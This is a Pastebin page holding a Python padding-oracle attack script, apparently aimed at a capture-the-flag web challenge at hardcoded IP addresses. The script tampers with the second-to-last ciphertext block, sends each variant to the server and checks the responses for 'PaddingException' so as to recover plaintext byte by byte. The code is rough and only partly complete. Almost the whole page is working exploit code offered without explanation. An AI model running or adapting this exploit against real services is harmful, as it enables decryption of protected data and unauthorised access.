Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/Library/Frameworks/Python.framework/Versions/3.7/bin/python3
- import requests
- import base64
- burp0_url = "http://34.74.105.127/0c09509317/"
- burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) "
- "Gecko/20100101 Firefox/72.0",
- "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
- "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate",
- "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://http://35.190.155.168",
- "Connection": "close", "Referer": "http://34.74.105.127/73294cf70f", "Upgrade-Insecure-Requests": "1"}
- burp0_data = {"title": "", "body": "kakarot"}
- encryptedResponse = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, allow_redirects=False)
- print(encryptedResponse.status_code)
- #b64_ct_repl = (encryptedResponse.headers["Location"].split('=')[1])
- b64_ct_repl = "OUe0h0AiEEILFmpWIfBJlcQ97QiZ-ugj1eeqR1xp5ToM0okTekP-oTnUlxlHwbNiiNoMbpO-" \
- "FGxy0adyND6Gy67qzL325r4pic76O5JHrih9DhUwI4xBLjp4NhGYufF7w4Y4c!bD-LvinnI7c6W" \
- "EBhxqFIZ8i7F8csn1MciP2NEgbrWx8QOFmk4uMdEUrq0!7DKKBQgkSH9PEpFHUjbu-A~~"
- print("Ciphertext encoded with b64: " + b64_ct_repl)
- b64_ct = b64_ct_repl.replace('~', '=').replace('!', '/').replace('-', '+')
- ct = base64.b64decode(b64_ct)
- ct_divided = ([ct[i:i+16] for i in range(0, len(ct), 16)])
- ct_numberOfBlocks = len(ct_divided)
- print("Changing the second Last block to XOR that with Last decrypted "
- "block. Dont worry, decryption is handled by the server")
- blockToChange = ct_divided[ct_numberOfBlocks-2]
- for i in range(1, 254):
- if i != 1:
- guess = bytes(15) + bytes([i])
- padding = bytes(15) + bytes([1])
- encryptedBytes = [ bytes([a ^ b]) for (a,b) in zip(guess, padding) ]
- ct_divided[ct_numberOfBlocks-2] = b''.join(encryptedBytes)
- new_ct = b''.join(ct_divided)
- postContent = base64.b64encode(new_ct)
- postContent = postContent.decode('utf-8').replace('=', '~').replace('/', '!').replace('+', '-')
- burp1_url = "http://35.190.155.168/08165c13b1/?post=" + (postContent)
- pt_resp = requests.get(burp1_url, headers=burp0_headers)
- if "PaddingException" not in pt_resp.text:
- print("GET URL: " + burp1_url)
- print(str(len(postContent)))
- print(pt_resp.text)
- print("For offset: " + str(i))
- if "multiple" in pt_resp.text:
- print(pt_resp.text)
- break
- # burp1_url = "http://35.190.155.168:80/b7e6c184d5/?post=" + b64_ct_repl
- # burp1_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://35.227.24.107/474eb203e4/", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
- # pt_resp = requests.get(burp1_url, headers=burp1_headers)
- # print(pt_resp.text)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement